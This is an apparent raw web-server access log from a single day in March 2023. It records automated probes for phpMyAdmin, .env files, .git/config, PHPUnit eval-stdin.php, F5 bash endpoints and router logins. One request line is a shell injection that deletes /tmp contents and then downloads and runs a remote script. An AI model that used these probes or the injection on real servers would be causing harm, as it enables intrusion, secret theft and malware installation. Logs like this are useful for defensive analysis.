20.232.101.84 - - [29/Mar/2023:11:54:29 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:29 +0000] "GET /webdb/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:29 +0000] "GET /phpMyAdmin2/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:29 +0000] "GET /mysql-admin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:30 +0000] "GET /phpMyAdmin-2/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:30 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:30 +0000] "GET /myadmin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:31 +0000] "GET /admin/adminer.php?username=******** HTTP/1.1" 200 - "-" "python-requests/2.28.1"
20.232.101.84 - - [29/Mar/2023:11:54:31 +0000] "GET /frontend_dev.php/$ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.232.101.84 - - [29/Mar/2023:11:54:32 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.232.101.84 - - [29/Mar/2023:11:54:33 +0000] "GET /.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.232.101.84 - - [29/Mar/2023:11:54:33 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.232.101.84 - - [29/Mar/2023:11:54:34 +0000] "GET /phpinfo.php HTTP/1.1" 200 23920 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.232.101.84 - - [29/Mar/2023:11:54:35 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 413743 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:12:27:02 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:12:27:03 +0000] "POST / HTTP/1.1" 405 409715 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
179.43.177.242 - - [29/Mar/2023:12:28:10 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
185.254.196.173 - - [29/Mar/2023:12:30:34 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [29/Mar/2023:12:30:35 +0000] "POST / HTTP/1.1" 405 409702 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.92.73.113 - - [29/Mar/2023:12:31:00 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "python-requests/2.20.1"
43.154.128.189 - - [29/Mar/2023:12:50:06 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.170.223.130 - - [29/Mar/2023:13:02:29 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
43.154.128.189 - - [29/Mar/2023:14:08:49 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:14:19:34 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:14:19:34 +0000] "POST / HTTP/1.1" 405 409683 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.128.232.149 - - [29/Mar/2023:14:29:07 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423594 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
135.125.217.54 - - [29/Mar/2023:15:15:46 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:15:15:47 +0000] "POST / HTTP/1.1" 405 409727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [29/Mar/2023:15:28:29 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.155.126.211 - - [29/Mar/2023:15:31:50 +0000] "GET / HTTP/1.1" 200 8376 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
34.140.130.61 - - [29/Mar/2023:15:34:03 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.28.2"
::1 - - [29/Mar/2023:15:34:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:15:34:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:15:34:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:15:34:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:15:34:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:15:34:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:15:34:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
193.32.162.159 - - [29/Mar/2023:16:15:48 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.217.145.45 - - [29/Mar/2023:16:29:23 +0000] "GET / HTTP/1.0" 200 8382 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
135.125.217.54 - - [29/Mar/2023:16:35:57 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:16:35:58 +0000] "POST / HTTP/1.1" 405 409707 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [29/Mar/2023:16:47:14 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.33.80.243 - - [29/Mar/2023:16:49:29 +0000] "\x16\x03\x01" 400 226 "-" "-"
39.103.194.15 - - [29/Mar/2023:17:26:42 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 200 - "-" "-"
39.103.194.15 - - [29/Mar/2023:17:26:42 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
39.103.194.15 - - [29/Mar/2023:17:26:42 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 200 - "-" "-"
39.103.194.15 - - [29/Mar/2023:17:26:45 +0000] "GET http://13.244.159.169:80/MyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
39.103.194.15 - - [29/Mar/2023:17:26:57 +0000] "GET http://13.244.159.169:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
39.103.194.15 - - [29/Mar/2023:17:27:13 +0000] "GET http://13.244.159.169:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 200 - "-" "-"
185.254.196.173 - - [29/Mar/2023:17:31:40 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [29/Mar/2023:17:31:41 +0000] "POST / HTTP/1.1" 405 409676 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [29/Mar/2023:18:05:38 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:18:26:50 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:18:26:51 +0000] "POST / HTTP/1.1" 405 409735 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [29/Mar/2023:18:37:13 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [29/Mar/2023:18:37:13 +0000] "POST / HTTP/1.1" 405 409740 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [29/Mar/2023:18:56:42 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.217.54 - - [29/Mar/2023:19:23:57 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:19:23:57 +0000] "POST / HTTP/1.1" 405 409699 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [29/Mar/2023:19:24:11 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
133.18.175.10 - admin [29/Mar/2023:19:48:47 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 405 422449 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
133.18.175.10 - - [29/Mar/2023:19:48:48 +0000] "GET / HTTP/1.1" 200 41226 "-" "curl/7.58.0"
208.91.69.23 - - [29/Mar/2023:20:01:02 +0000] "HEAD /wordpress HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:02 +0000] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:03 +0000] "HEAD /wp HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:03 +0000] "HEAD /bc HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:03 +0000] "HEAD /bk HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:04 +0000] "HEAD /backup HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:04 +0000] "HEAD /old HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:04 +0000] "HEAD /new HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:05 +0000] "HEAD /main HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
208.91.69.23 - - [29/Mar/2023:20:01:05 +0000] "HEAD /home HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:20:12:05 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:20:12:06 +0000] "POST / HTTP/1.1" 405 409729 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.129.128.239 - - [29/Mar/2023:20:33:59 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
43.154.128.189 - - [29/Mar/2023:20:42:30 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
180.95.238.55 - - [29/Mar/2023:20:44:13 +0000] "GET / HTTP/1.0" 200 41226 "-" "-"
172.104.11.4 - - [29/Mar/2023:20:49:16 +0000] "\x16\x03\x01" 400 226 "-" "-"
185.254.196.173 - - [29/Mar/2023:21:42:53 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [29/Mar/2023:21:42:53 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.59.24.76 - - [29/Mar/2023:21:44:53 +0000] "\x16\x03\x01" 400 226 "-" "-"
139.59.24.76 - - [29/Mar/2023:21:44:54 +0000] "\x16\x03\x01" 400 226 "-" "-"
139.59.24.76 - - [29/Mar/2023:21:44:54 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
139.59.24.76 - - [29/Mar/2023:21:44:55 +0000] "GET /client/get_targets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
139.59.24.76 - - [29/Mar/2023:21:44:56 +0000] "GET /upl.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
139.59.24.76 - - [29/Mar/2023:21:44:56 +0000] "\x16\x03\x01" 400 226 "-" "-"
139.59.24.76 - - [29/Mar/2023:21:44:57 +0000] "GET /geoip/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
139.59.24.76 - - [29/Mar/2023:21:44:57 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
139.59.24.76 - - [29/Mar/2023:21:44:58 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:22:01:41 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:22:01:41 +0000] "POST / HTTP/1.1" 405 409729 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [29/Mar/2023:22:04:05 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.209.160.120 - - [29/Mar/2023:22:24:43 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423561 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/phpma/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/admin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/dbadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/db/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/webdb/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/sqlweb/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:08 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/MyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/SQL/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/mysql/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/php/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:09 +0000] "GET http://13.244.159.169:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/pma/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/phpmy-admin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/phpmanager/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/websql/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/php-myadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/mysqladmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/webadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/admin/pma/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/mysql-admin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/mysqlmanager/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:10 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:11 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:11 +0000] "GET http://13.244.159.169:80/phpmyadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:11 +0000] "GET http://13.244.159.169:80/myadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:11 +0000] "GET http://13.244.159.169:80/sqlmanager/scripts/setup.php HTTP/1.0" 200 - "-" "-"
152.136.235.236 - - [29/Mar/2023:22:29:11 +0000] "GET http://13.244.159.169:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 200 - "-" "-"
::1 - - [29/Mar/2023:22:29:12 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:13 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:14 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:15 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:16 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
